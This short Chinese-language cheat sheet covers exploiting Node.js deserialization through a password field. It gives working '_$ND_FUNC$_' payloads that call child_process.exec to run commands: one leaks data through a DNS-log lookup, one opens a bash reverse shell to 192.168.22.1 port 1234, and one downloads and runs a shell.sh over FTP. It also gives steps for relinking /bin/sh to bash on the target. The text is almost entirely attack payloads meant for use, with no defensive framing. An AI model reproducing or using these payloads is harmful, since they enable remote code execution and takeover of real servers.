Node.js反序列化

payload: 密码框输入

_$ND_FUNC$_function (){require('child_process').exec('ping -c 3 `date>/tmp/1.txt`.`date +%s`.test.dnslog.link')}()
title 服务器会成功创建1.txt


反弹shell:

_$ND_FUNC$_function (){require('child_process').exec('/bin/bash -i >& /dev/tcp/192.168.22.1/1234 0>&1')}()
如果不行试以下

$ND_FUNC$_function (){require('child_process').exec('wget ftp://172.17.0.1/shell.sh && sh shell.sh')}()
shell.sh内容为/bin/bash -i >& /dev/tcp/192.168.22.1/1234 0>&1
由于ubuntu有点问题一开始是没办法执行shell的会提示sh: 1: Syntax error: Bad fd number 这是因为ubuntu使用的dash,所以我们要使用以下命令改成bash
mv /bin/sh /bin/sh.orig
ln -s /bin/bash /bin/sh